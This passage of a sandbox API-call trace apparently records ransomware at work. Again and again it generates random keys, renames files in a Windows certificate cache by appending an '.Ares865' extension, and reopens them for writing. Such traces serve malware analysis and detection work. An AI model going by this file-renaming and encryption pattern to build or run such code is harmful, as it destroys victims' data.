HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.ares865"), dwFlags=0x1) returned 1 [0110.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.407] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=471) returned 1 [0110.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.407] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.408] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.408] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.412] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.414] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865") returned 122 [0110.414] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwFlags=0x1) returned 1 [0110.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=506) returned 1 [0110.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.424] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.428] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.428] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.428] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865") returned 155 [0110.429] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.ares865"), dwFlags=0x1) returned 1 [0110.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1660) returned 1 [0110.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.435] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.435] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865") returned 155 [0110.436] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.ares865"), dwFlags=0x1) returned 1 [0110.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.438] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.439] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.439] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.441] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865") returned 155 [0110.442] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.ares865"), dwFlags=0x1) returned 1 [0110.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1763) returned 1 [0110.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.444] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.447] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.449] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865") returned 155 [0110.449] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.ares865"), dwFlags=0x1) returned 1 [0110.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.451] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.451] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.452] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.452] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.459] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.460] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865") returned 155 [0110.461] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.ares865"), dwFlags=0x1) returned 1 [0110.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.462] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.462] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.463] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.463] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.467] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.467] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.467] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.468] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865") returned 155 [0110.468] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.ares865"), dwFlags=0x1) returned 1 [0110.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.470] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.470] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.471] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.471] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.473] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.474] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865") returned 155 [0110.475] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.ares865"), dwFlags=0x1) returned 1 [0110.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.476] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0110.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.480] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.481] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865") returned 155 [0110.481] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 